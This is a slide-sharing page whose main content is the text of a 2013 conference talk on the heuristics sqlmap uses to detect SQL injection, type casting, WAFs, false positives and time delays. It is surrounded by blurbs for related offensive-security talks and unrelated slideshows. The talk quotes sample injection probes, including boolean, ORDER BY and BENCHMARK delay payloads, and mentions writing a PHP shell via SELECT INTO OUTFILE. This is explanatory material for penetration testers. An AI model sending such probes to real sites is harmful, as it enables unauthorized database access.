These are the slides from a talk "Heuristic methods
used in sqlmap" held at FSec 2013 conference (Croatia / Varazdin 19th September 2013) by Miroslav Stampar
It all starts with the ' (SQL injection from attacker's point of view)Miroslav Stampar
These are the slides from a talk "It all starts with the ' (SQL injection from attacker's point of view)" held at FSec 2011 conference (Croatia / Varazdin 22nd September 2011) by Miroslav Stampar
The presentation highlights techniques to exploit a MySQL, PostgreSQL or Microsoft SQL Server database server in real world: how to abuse databases features to takeover the server as a whole, how to break out of the mere database process, get control of the operating system and escalate process' privileges to SYSTEM and how to make the life of the forensics analyst harder in a post-exploitation investigation.
These slides have been presented at AthCon 2010 conference in Athens on June 3, 2010.
These are the slides from a talk "DNS exfiltration using sqlmap" held at PHDays 2012 conference (Russia / Moscow 30th–31st May 2012) by Miroslav Stampar.
These are the slides from a talk "sqlmap - security development in Python" held at EuroPython 2011 conference (Italy / Florence 19th–26th June 2011) by Miroslav Stampar
It all starts with the ' (SQL injection from attacker's point of view)Miroslav Stampar
These are the slides from a talk "It all starts with the ' (SQL injection from attacker's point of view)" held at FSec 2011 conference (Croatia / Varazdin 22nd September 2011) by Miroslav Stampar
The presentation highlights techniques to exploit a MySQL, PostgreSQL or Microsoft SQL Server database server in real world: how to abuse databases features to takeover the server as a whole, how to break out of the mere database process, get control of the operating system and escalate process' privileges to SYSTEM and how to make the life of the forensics analyst harder in a post-exploitation investigation.
These slides have been presented at AthCon 2010 conference in Athens on June 3, 2010.
These are the slides from a talk "DNS exfiltration using sqlmap" held at PHDays 2012 conference (Russia / Moscow 30th–31st May 2012) by Miroslav Stampar.
These are the slides from a talk "sqlmap - security development in Python" held at EuroPython 2011 conference (Italy / Florence 19th–26th June 2011) by Miroslav Stampar
Advanced SQL injection to operating system full control (whitepaper)Bernardo Damele A. G.
Over ten years have passed since a famous hacker coined the term "SQL injection" and it is still considered one of the major web application threats, affecting over 70% of web application on the Net. A lot has been said on this specific vulnerability, but not all of the aspects and implications have been uncovered, yet.
It's time to explore new ways to get complete control over the database management system's underlying operating system through a SQL injection vulnerability in those over-looked and theoretically not exploitable scenarios: From the command execution on MySQL and PostgreSQL to a stored procedure's buffer overflow exploitation on Microsoft SQL Server. These and much more will be unveiled and demonstrated with my own tool's new version that I will release at the Conference (http://www.blackhat.com/html/bh-europe-09/bh-eu-09-speakers.html#Damele).
Advanced SQL injection to operating system full control (slides)Bernardo Damele A. G.
Over ten years have passed since a famous hacker coined the term "SQL injection" and it is still considered one of the major web application threats, affecting over 70% of web application on the Net. A lot has been said on this specific vulnerability, but not all of the aspects and implications have been uncovered, yet.
It's time to explore new ways to get complete control over the database management system's underlying operating system through a SQL injection vulnerability in those over-looked and theoretically not exploitable scenarios: From the command execution on MySQL and PostgreSQL to a stored procedure's buffer overflow exploitation on Microsoft SQL Server. These and much more will be unveiled and demonstrated with my own tool's new version that I will release at the Conference (http://www.blackhat.com/html/bh-europe-09/bh-eu-09-speakers.html#Damele).
These slides have been presented at Black Hat Euroe conference in Amsterdam on April 16, 2009.
The presentation has a quick preamble on SQL injection definition, sqlmap and its key features.
I will then illustrate into details common and uncommon problems and respective solutions with examples that a penetration tester faces when he wants to take advantage of any kind of web application SQL injection flaw on real world web applications, for instance SQL injection in ORDER BY and LIMIT clauses, single entry UNION query SQL injection, specific web application technologies IDS bypasses and more.
These slides have been presented at the 2nd Digital Security Forum in Lisbon on June 27, 2009.
Updated version of http://www.slideshare.net/inquis/sql-injection-not-only-and-11.
Expanding the control over the operating system from the databaseBernardo Damele A. G.
Using a database, either via a SQL injection or via direct connection, as a stepping stone to control the underlying operating system can be achieved.
There is much to say on operating system control by owning a database server: Windows registry access, anti-forensics technique to establish an out-of-band stealth connection, buffer overflow exploitation with memory protections bypass and custom user-defined function injection.
These slides have been presented at SOURCE Conference in Barcelona on September 21, 2009.
HTTP Parameter Pollution Vulnerabilities in Web Applications (Black Hat EU 2011)Marco Balduzzi
While input validation vulnerabilities such as XSS and SQL injection have been intensively studied, a new class of injection vulnerabilities called HTTP Parameter Pollution (HPP) has not received as much attention. HPP attacks consist of injecting encoded query string delimiters into other existing parameters. If a web application does not properly sanitize the user input, a malicious user can compromise the logic of the application to perform either client-side or server-side attacks. One consequence of HPP attacks is that the attacker can potentially override existing hard-coded HTTP parameters to modify the behavior of an application, bypass input validation checkpoints, and access and possibly exploit variables that may be out of direct reach.
In the talk we present the first automated system for the detection of HPP vulnerabilities in real web applications. Our approach consists of injecting fuzzed parameters into the web application and a set of tests and heuristics to determine if the pages that are generated contain HPP vulnerabilities. We used this system to conduct a large-scale experiment by testing more than 5,000 popular websites and discovering unknown HPP flaws in many important and well-known sites such as Microsoft, Google, VMWare, Facebook, Symantec, Paypal and others. These sites have been all informed and many of them have acknowledged or fixed the problems. We will explain in details how to efficiently detect HPP bugs and how to prevent this novel class of injection vulnerabilities in future web applications.
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ BehaviourSoroush Dalili
Although web application firewall (WAF) solutions are very useful to prevent common or automated attacks, most of them are based on blacklist approaches and are still far from perfect. This talk illustrates a number of creative techniques to smuggle and reshape HTTP requests using the strange behaviour of web servers and features such as request encoding or HTTP pipelining. These methods can come in handy when testing a website behind a WAF and can help penetration testers and bug bounty hunters to avoid drama and pain! Knowing these techniques is also beneficial for the defence team in order to design appropriate mitigation techniques. Additionally, it shows why developers should not solely rely on WAFs as the defence mechanism.
Finally, an open source Burp Suite extension will be introduced that can be used to assess or bypass a WAF solution using some of the techniques discussed in this talk. The plan is to keep improving this extension with the help of the http.ninja project.
XSS is much more than just <script>alert(1)</script>. Thousands of unique vectors can be built and more complex payloads to evade filters and WAFs. In these slides, cool techniques to bypass them are described, from HTML to javascript. See also http://brutelogic.com.br/blog
These are the slides from a guest talk "2014 – Year of Broken Name Generator(s)" held at Faculty of Electrical Engineering and Computing 2015 (Croatia / Zagreb 16th January 2015) by Miroslav Stampar
These are the slides from a talk "Riding the Overflow - Then and Now" held at BalCCon 2014 (Serbia / Novi Sad 06th September 2014) by Miroslav Stampar
p.s. this presentation along with presented buffer overflow examples can be found at: http://www.mediafire.com/download/gjeue4wvw2iccc9/balccon2k14_overflow.7z
Advanced SQL injection to operating system full control (whitepaper)Bernardo Damele A. G.
Over ten years have passed since a famous hacker coined the term "SQL injection" and it is still considered one of the major web application threats, affecting over 70% of web application on the Net. A lot has been said on this specific vulnerability, but not all of the aspects and implications have been uncovered, yet.
It's time to explore new ways to get complete control over the database management system's underlying operating system through a SQL injection vulnerability in those over-looked and theoretically not exploitable scenarios: From the command execution on MySQL and PostgreSQL to a stored procedure's buffer overflow exploitation on Microsoft SQL Server. These and much more will be unveiled and demonstrated with my own tool's new version that I will release at the Conference (http://www.blackhat.com/html/bh-europe-09/bh-eu-09-speakers.html#Damele).
Advanced SQL injection to operating system full control (slides)Bernardo Damele A. G.
Over ten years have passed since a famous hacker coined the term "SQL injection" and it is still considered one of the major web application threats, affecting over 70% of web application on the Net. A lot has been said on this specific vulnerability, but not all of the aspects and implications have been uncovered, yet.
It's time to explore new ways to get complete control over the database management system's underlying operating system through a SQL injection vulnerability in those over-looked and theoretically not exploitable scenarios: From the command execution on MySQL and PostgreSQL to a stored procedure's buffer overflow exploitation on Microsoft SQL Server. These and much more will be unveiled and demonstrated with my own tool's new version that I will release at the Conference (http://www.blackhat.com/html/bh-europe-09/bh-eu-09-speakers.html#Damele).
These slides have been presented at Black Hat Euroe conference in Amsterdam on April 16, 2009.
The presentation has a quick preamble on SQL injection definition, sqlmap and its key features.
I will then illustrate into details common and uncommon problems and respective solutions with examples that a penetration tester faces when he wants to take advantage of any kind of web application SQL injection flaw on real world web applications, for instance SQL injection in ORDER BY and LIMIT clauses, single entry UNION query SQL injection, specific web application technologies IDS bypasses and more.
These slides have been presented at the 2nd Digital Security Forum in Lisbon on June 27, 2009.
Updated version of http://www.slideshare.net/inquis/sql-injection-not-only-and-11.
Expanding the control over the operating system from the databaseBernardo Damele A. G.
Using a database, either via a SQL injection or via direct connection, as a stepping stone to control the underlying operating system can be achieved.
There is much to say on operating system control by owning a database server: Windows registry access, anti-forensics technique to establish an out-of-band stealth connection, buffer overflow exploitation with memory protections bypass and custom user-defined function injection.
These slides have been presented at SOURCE Conference in Barcelona on September 21, 2009.
HTTP Parameter Pollution Vulnerabilities in Web Applications (Black Hat EU 2011)Marco Balduzzi
While input validation vulnerabilities such as XSS and SQL injection have been intensively studied, a new class of injection vulnerabilities called HTTP Parameter Pollution (HPP) has not received as much attention. HPP attacks consist of injecting encoded query string delimiters into other existing parameters. If a web application does not properly sanitize the user input, a malicious user can compromise the logic of the application to perform either client-side or server-side attacks. One consequence of HPP attacks is that the attacker can potentially override existing hard-coded HTTP parameters to modify the behavior of an application, bypass input validation checkpoints, and access and possibly exploit variables that may be out of direct reach.
In the talk we present the first automated system for the detection of HPP vulnerabilities in real web applications. Our approach consists of injecting fuzzed parameters into the web application and a set of tests and heuristics to determine if the pages that are generated contain HPP vulnerabilities. We used this system to conduct a large-scale experiment by testing more than 5,000 popular websites and discovering unknown HPP flaws in many important and well-known sites such as Microsoft, Google, VMWare, Facebook, Symantec, Paypal and others. These sites have been all informed and many of them have acknowledged or fixed the problems. We will explain in details how to efficiently detect HPP bugs and how to prevent this novel class of injection vulnerabilities in future web applications.
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ BehaviourSoroush Dalili
Although web application firewall (WAF) solutions are very useful to prevent common or automated attacks, most of them are based on blacklist approaches and are still far from perfect. This talk illustrates a number of creative techniques to smuggle and reshape HTTP requests using the strange behaviour of web servers and features such as request encoding or HTTP pipelining. These methods can come in handy when testing a website behind a WAF and can help penetration testers and bug bounty hunters to avoid drama and pain! Knowing these techniques is also beneficial for the defence team in order to design appropriate mitigation techniques. Additionally, it shows why developers should not solely rely on WAFs as the defence mechanism.
Finally, an open source Burp Suite extension will be introduced that can be used to assess or bypass a WAF solution using some of the techniques discussed in this talk. The plan is to keep improving this extension with the help of the http.ninja project.
XSS is much more than just <script>alert(1)</script>. Thousands of unique vectors can be built and more complex payloads to evade filters and WAFs. In these slides, cool techniques to bypass them are described, from HTML to javascript. See also http://brutelogic.com.br/blog
These are the slides from a guest talk "2014 – Year of Broken Name Generator(s)" held at Faculty of Electrical Engineering and Computing 2015 (Croatia / Zagreb 16th January 2015) by Miroslav Stampar
These are the slides from a talk "Riding the Overflow - Then and Now" held at BalCCon 2014 (Serbia / Novi Sad 06th September 2014) by Miroslav Stampar
p.s. this presentation along with presented buffer overflow examples can be found at: http://www.mediafire.com/download/gjeue4wvw2iccc9/balccon2k14_overflow.7z
These are the slides from a guest talk "Hash DoS Attack" held at Faculty of Electrical Engineering and Computing 2014 (Croatia / Zagreb 17th January 2014) by Miroslav Stampar
These are the slides from a talk "Analysis of mass SQL injection attacks" held at FSec 2012 conference (Croatia / Varazdin 21st September 2012) by Miroslav Stampar
These are the slides from a talk "Spot the Web Vulnerability" held at Hacktivity 2012 conference (Hungary / Budapest 12th–13th October 2012) by Miroslav Stampar.
7 Ways to Stay 7 Years Ahead of the ThreatIBM Security
With breach reports becoming a weekly, if not daily, occurrence, organizations need proactive security to protect themselves and their customers against the loss of sensitive data. Hear from IBM X-Force research and product experts on 7 types of behavioral based protection layered into network and endpoint security that can help your organization stay ahead of the threat. Our protection is so successful, in fact, that our IPS customer were protected from exploits of the recently disclosed Shellshock vulnerability seven years ahead of the threat.
The disappearing network perimeter mean organizations can no longer rely on traditional methods to secure their networks, and must plan for porous access to corporate assets and intellectual property. Deploying a simple intrusion prevention solution that relies in pattern matching is insufficient to identify malicious actors who can evade traditional protection strategies. By focusing on blocking the behavior of malware, rather than pattern matching against specific exploits, organizations are better protected with techniques like protocol analysis detection, shellcode heuristics, application layer heuristics, malicious communication prevention, and exploit chain disruption.
View the full on-demand webcast: http://securityintelligence.com/events/8-ways-stay-5-years-ahead-threat/#.VYxgB_lVhBf
Balancing the line by using heuristic method based on cpm in salbp –a case studyeSAT Journals
Abstract
In mass production systems, line balancing plays a great role, but this is not easy even if it is a simple straight line. So, in order to
solve these problems Heuristic methods are very much desirable. It is also found that Heuristic methods play a great role in the
formation of metaheuristic methods.Therefore it is very much important to use more efficient heuristic methods. In this research
paper we presents a heuristic method that is based on critical path method for simple assembly line balancing. This research is
mainly concerned with objectives of minimizing the number of workstations, improvement of smoothness index, mean absolute
deviation (MAD) and increasing line efficiency.
Keywords-Heuristic methods,Assembly line balancing problem, Critical path method, Simple assembly line balancing.
SQLMAP is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers.
Michael Bolton - Heuristics: Solving Problems RapidlyTEST Huddle
EuroSTAR Software Testing Conference 2008 presentation on Heuristics: Solving Problems Rapidly by Michael Bolton. See more at conferences.eurostarsoftwaretesting.com/past-presentations/
Presentación de Jaime Nebrera de Eneo Tecnología S.L., durante la XV Jornada de Seguridad TI de Nextel S.A. en la Alhóndiga de Bilbao el jueves 27 de junio de 2013.
Generating a custom Ruby SDK for your web service or Rails API using Smithyg2nightmarescribd
Have you ever wanted a Ruby client API to communicate with your web service? Smithy is a protocol-agnostic language for defining services and SDKs. Smithy Ruby is an implementation of Smithy that generates a Ruby SDK using a Smithy model. In this talk, we will explore Smithy and Smithy Ruby to learn how to generate custom feature-rich SDKs that can communicate with any web service, such as a Rails JSON API.
Neuro-symbolic is not enough, we need neuro-*semantic*Frank van Harmelen
Neuro-symbolic (NeSy) AI is on the rise. However, simply machine learning on just any symbolic structure is not sufficient to really harvest the gains of NeSy. These will only be gained when the symbolic structures have an actual semantics. I give an operational definition of semantics as “predictable inference”.
All of this illustrated with link prediction over knowledge graphs, but the argument is general.
The Art of the Pitch: WordPress Relationships and SalesLaura Byrne
Clients don’t know what they don’t know. What web solutions are right for them? How does WordPress come into the picture? How do you make sure you understand scope and timeline? What do you do if sometime changes?
All these questions and more will be explored as we talk about matching clients’ needs with what your agency offers without pulling teeth or pulling your hair out. Practical tips, and strategies for successful relationship building that leads to closing the deal.
State of ICS and IoT Cyber Threat Landscape Report 2024 previewPrayukth K V
The IoT and OT threat landscape report has been prepared by the Threat Research Team at Sectrio using data from Sectrio, cyber threat intelligence farming facilities spread across over 85 cities around the world. In addition, Sectrio also runs AI-based advanced threat and payload engagement facilities that serve as sinks to attract and engage sophisticated threat actors, and newer malware including new variants and latent threats that are at an earlier stage of development.
The latest edition of the OT/ICS and IoT security Threat Landscape Report 2024 also covers:
State of global ICS asset and network exposure
Sectoral targets and attacks as well as the cost of ransom
Global APT activity, AI usage, actor and tactic profiles, and implications
Rise in volumes of AI-powered cyberattacks
Major cyber events in 2024
Malware and malicious payload trends
Cyberattack types and targets
Vulnerability exploit attempts on CVEs
Attacks on counties – USA
Expansion of bot farms – how, where, and why
In-depth analysis of the cyber threat landscape across North America, South America, Europe, APAC, and the Middle East
Why are attacks on smart factories rising?
Cyber risk predictions
Axis of attacks – Europe
Systemic attacks in the Middle East
Download the full report from here:
https://sectrio.com/resources/ot-threat-landscape-reports/sectrio-releases-ot-ics-and-iot-security-threat-landscape-report-2024/
Securing your Kubernetes cluster_ a step-by-step guide to success !KatiaHIMEUR1
Today, after several years of existence, an extremely active community and an ultra-dynamic ecosystem, Kubernetes has established itself as the de facto standard in container orchestration. Thanks to a wide range of managed services, it has never been so easy to set up a ready-to-use Kubernetes cluster.
However, this ease of use means that the subject of security in Kubernetes is often left for later, or even neglected. This exposes companies to significant risks.
In this talk, I'll show you step-by-step how to secure your Kubernetes cluster for greater peace of mind and reliability.
JMeter webinar - integration with InfluxDB and GrafanaRTTS
Watch this recorded webinar about real-time monitoring of application performance. See how to integrate Apache JMeter, the open-source leader in performance testing, with InfluxDB, the open-source time-series database, and Grafana, the open-source analytics and visualization application.
In this webinar, we will review the benefits of leveraging InfluxDB and Grafana when executing load tests and demonstrate how these tools are used to visualize performance metrics.
Length: 30 minutes
Session Overview
-------------------------------------------
During this webinar, we will cover the following topics while demonstrating the integrations of JMeter, InfluxDB and Grafana:
- What out-of-the-box solutions are available for real-time monitoring JMeter tests?
- What are the benefits of integrating InfluxDB and Grafana into the load testing stack?
- Which features are provided by Grafana?
- Demonstration of InfluxDB and Grafana using a practice web application
To view the webinar recording, go to:
https://www.rttsweb.com/jmeter-integration-webinar
Slack (or Teams) Automation for Bonterra Impact Management (fka Social Soluti...Jeffrey Haguewood
Sidekick Solutions uses Bonterra Impact Management (fka Social Solutions Apricot) and automation solutions to integrate data for business workflows.
We believe integration and automation are essential to user experience and the promise of efficient work through technology. Automation is the critical ingredient to realizing that full vision. We develop integration products and services for Bonterra Case Management software to support the deployment of automations for a variety of use cases.
This video focuses on the notifications, alerts, and approval requests using Slack for Bonterra Impact Management. The solutions covered in this webinar can also be deployed for Microsoft Teams.
Interested in deploying notification automations for Bonterra Impact Management? Contact us at sales@sidekicksolutionsllc.com to discuss next steps.
UiPath Test Automation using UiPath Test Suite series, part 4DianaGray10
Welcome to UiPath Test Automation using UiPath Test Suite series part 4. In this session, we will cover Test Manager overview along with SAP heatmap.
The UiPath Test Manager overview with SAP heatmap webinar offers a concise yet comprehensive exploration of the role of a Test Manager within SAP environments, coupled with the utilization of heatmaps for effective testing strategies.
Participants will gain insights into the responsibilities, challenges, and best practices associated with test management in SAP projects. Additionally, the webinar delves into the significance of heatmaps as a visual aid for identifying testing priorities, areas of risk, and resource allocation within SAP landscapes. Through this session, attendees can expect to enhance their understanding of test management principles while learning practical approaches to optimize testing processes in SAP environments using heatmap visualization techniques
What will you get from this session?
1. Insights into SAP testing best practices
2. Heatmap utilization for testing
3. Optimization of testing processes
4. Demo
Topics covered:
Execution from the test manager
Orchestrator execution result
Defect reporting
SAP heatmap example with demo
Speaker:
Deepak Rai, Automation Practice Lead, Boundaryless Group and UiPath MVP
Builder.ai Founder Sachin Dev Duggal's Strategic Approach to Create an Innova...Ramesh Iyer
In today's fast-changing business world, Companies that adapt and embrace new ideas often need help to keep up with the competition. However, fostering a culture of innovation takes much work. It takes vision, leadership and willingness to take risks in the right proportion. Sachin Dev Duggal, co-founder of Builder.ai, has perfected the art of this balance, creating a company culture where creativity and growth are nurtured at each stage.
Transcript: Selling digital books in 2024: Insights from industry leaders - T...BookNet Canada
The publishing industry has been selling digital audiobooks and ebooks for over a decade and has found its groove. What’s changed? What has stayed the same? Where do we go from here? Join a group of leading sales peers from across the industry for a conversation about the lessons learned since the popularization of digital books, best practices, digital book supply chain management, and more.
Link to video recording: https://bnctechforum.ca/sessions/selling-digital-books-in-2024-insights-from-industry-leaders/
Presented by BookNet Canada on May 28, 2024, with support from the Department of Canadian Heritage.
Smart TV Buyer Insights Survey 2024 by 91mobiles.pdf91mobiles
91mobiles recently conducted a Smart TV Buyer Insights Survey in which we asked over 3,000 respondents about the TV they own, aspects they look at on a new TV, and their TV buying preferences.
Elevating Tactical DDD Patterns Through Object CalisthenicsDorra BARTAGUIZ
After immersing yourself in the blue book and its red counterpart, attending DDD-focused conferences, and applying tactical patterns, you're left with a crucial question: How do I ensure my design is effective? Tactical patterns within Domain-Driven Design (DDD) serve as guiding principles for creating clear and manageable domain models. However, achieving success with these patterns requires additional guidance. Interestingly, we've observed that a set of constraints initially designed for training purposes remarkably aligns with effective pattern implementation, offering a more ‘mechanical’ approach. Let's explore together how Object Calisthenics can elevate the design of your tactical DDD patterns, offering concrete help for those venturing into DDD for the first time!
Leading Change strategies and insights for effective change management pdf 1.pdf
Heuristic methods used in sqlmap
1. Heuristic methods
used in sqlmap
Miroslav Štampar
(dev@sqlmap.org)
Heuristic methods
used in sqlmap
Miroslav Štampar
(dev@sqlmap.org)
2. FSec – FOI 2013, Varaždin (Croatia) September 19th, 2013 2
Heuristic method
Heuristic (/hjʉˈrɪstɨk/; Greek: “Εὑρίσκω”, “find” or
“discover”)
Educational shortcuts to ease the cognitive load of
making a decision
Speeding up the process of finding a satisfactory
solution
Serve as an aid to learning, discovery and problem
solving
Experimental and trial-and-error approach
Resulting with a solution which is not guaranteed to
be optimal
3. FSec – FOI 2013, Varaždin (Croatia) September 19th, 2013 3
Heuristic SQL injection checks (1)
In some cases DBMS error reporting is enabled
Deliberately invalid parameter value is sent (e.g.
())'”(''”')
”SQL error: You have an error in your SQL syntax;
check the manual that corresponds to your MySQL
server version...”
Narrowing down tests to only those specific to
recognized/parsed DBMS
Automatically extending with DBMS specific tests that
would be done (only) on higher level
Switch --smart for finding targets in minutes
4. FSec – FOI 2013, Varaždin (Croatia) September 19th, 2013 4
Heuristic SQL injection checks (2)
5. FSec – FOI 2013, Varaždin (Croatia) September 19th, 2013 5
Heuristic SQL injection checks (3)
Particularly interesting cases when parameter
contains integer value (e.g. id=1)
Response is changing with value changed (e.g. id=2)
Response is the same for arithmetic operation resulting
in original value (e.g. id=1183-1182)
Warning the user that the processed parameter is
most probably prone to SQL injection attack(s)
Making user aware to persist in eventual further tests
(to use higher --level/--risk and/or --tamper)
6. FSec – FOI 2013, Varaždin (Croatia) September 19th, 2013 6
Heuristic SQL injection checks (4)
7. FSec – FOI 2013, Varaždin (Croatia) September 19th, 2013 7
Heuristic SQL injection checks (5)
In cases when error reporting is turned off
At least one generic (i.e. non-DBMS dependent) SQL
injection technique is found
Single request per supported DBMS is being sent
Using form supported by only the targeted one (e.g.
id=1 AND (SELECT 0x41597548)=0x41597548)
for MySQL)
If getting response as expected, narrowing and/or
expanding tests for particular DBMS
8. FSec – FOI 2013, Varaždin (Croatia) September 19th, 2013 8
Heuristic SQL injection checks (6)
9. FSec – FOI 2013, Varaždin (Croatia) September 19th, 2013 9
Type casting detection (1)
In some cases (preventive) hard type casting (e.g.
$id=intval($_REQUEST['id'])) is used
Especially noticeable on integer parameter values
(e.g. id=1)
Different responses for different integer values (e.g.
id=2)
Same response for appended random string values
(e.g. id=1vHxr)
High probability that the type casting is being used
(hence, not exploitable)
Warning the user of a potentially futile run
10. FSec – FOI 2013, Varaždin (Croatia) September 19th, 2013 10
Type casting detection (2)
11. FSec – FOI 2013, Varaždin (Croatia) September 19th, 2013 11
Length constraining detection (1)
Suhosin ( ) - popular open source PHP patch
“...protecting servers and users from known and
unknown flaws in PHP applications and PHP core...”
Constraining the length of request parameter values
(e.g. GET values constrained to less than 512 chars)
Problematic when longer payloads are used (e.g.
injecting of PHP shell through SELECT..INTO
OUTFILE statement)
12. FSec – FOI 2013, Varaždin (Croatia) September 19th, 2013 12
Length constraining detection (2)
One lengthy payload containing a simple boolean
question (e.g. id=1 AND 3182=...3182) is sent
right after successful identification of SQL injection
13. FSec – FOI 2013, Varaždin (Croatia) September 19th, 2013 13
WAF detection/fingeprinting (1)
Web Application Firewall (engl. abbr. WAF)
“...commonly used mechanism for prevention of
malicious web application attacks...”
Modsecurity returns HTTP error code 501 on detected
attack
F5 BIG-IP adds its own X-Cnection HTTP header to
the response
Generic detection (switch --check-waf)
Fingeprinting 28 different WAF products (switch
--identify-waf)
Sending deliberately suspicious payloads and
checking response(s) for unique characteristics
14. FSec – FOI 2013, Varaždin (Croatia) September 19th, 2013 14
WAF detection/fingeprinting (2)
15. FSec – FOI 2013, Varaždin (Croatia) September 19th, 2013 15
False positive detection (1)
“...term used for describing a result that indicates
that a given condition is present when it is not...”
Another way of saying “mistake”
Giving false sense of certainty while in reality there is
nothing exploitable at the other side
Especially noticeable in boolean-based blind and time-
based blind cases
Simple tests are being done after the detection phase
Inspecting responses to predetermined boolean
operations (e.g. id=1 AND 95>27)
16. FSec – FOI 2013, Varaždin (Croatia) September 19th, 2013 16
False positive detection (2)
17. FSec – FOI 2013, Varaždin (Croatia) September 19th, 2013 17
Delay detection (1)
Network latency (or lagging) is the main problem of
time-based blind technique
For example, used deliberate delay is 1 sec, normal
response times are >0.5 and <2.0 secs, what we can
conclude for 1.5 sec response?
Also, how to recognize delays in hard-queries (e.g.
BENCHMARK(5000000,MD5('foobar')))?
Mathematical statistics to the rescue
Gaussian bell-shaped curve for the normal distribution
is being calculated
Everything inside is considered as “normal”, outside
as “not normal”
18. FSec – FOI 2013, Varaždin (Croatia) September 19th, 2013 18
Delay detection (2)
Everything that's normal (i.e. not deliberately
delayed) should fit under the curve
μ(t) represents a mean, while σ(t) represents a
standard deviation of response times
99.99% of normal response times fall under the
upper border value μ(t) + 7σ(t)
19. FSec – FOI 2013, Varaždin (Croatia) September 19th, 2013 19
Delay detection (3)
sqlmap learns what's normal and what's not from
non-delay based payload responses (e.g. boolean-
based blind)
Also, few dummy requests are done if there is a need
for more
20. FSec – FOI 2013, Varaždin (Croatia) September 19th, 2013 20
Delay detection (4)
In case of considerable network latency user is
warned to use as high delay value as possible
On the other hand, if negligible, sqlmap optimizes the
delay value (if applicable) to a more appropriate one
21. FSec – FOI 2013, Varaždin (Croatia) September 19th, 2013 21
Finding number of query fields (1)
For successful usage of UNION-based technique,
number of fields has to be known
Foremost method used is ORDER BY clause
If response for an arbitrary large value (e.g. id=1
ORDER BY 9664#) drastically differs from neutral
(e.g. id=1 ORDER BY 1#)
sqlmap uses adapted (chunked) binary search
22. FSec – FOI 2013, Varaždin (Croatia) September 19th, 2013 22
Finding number of query fields (2)
If ORDER BY method is not usable, similar approach
is used as in delay detection
Constant field value (e.g. NULL) used across a
(current chunk of) search space in UNION ALL
SELECT statement
Searching for the number of fields that, compared to
the original response, “sticks out” out of others in a
statistical manner
Responses for non-valid number of fields will not
much differ from each other
Response for the right number of fields will appear
not normal compared to others
23. FSec – FOI 2013, Varaždin (Croatia) September 19th, 2013 23
Finding number of query fields (3)
24. FSec – FOI 2013, Varaždin (Croatia) September 19th, 2013 24
Questions?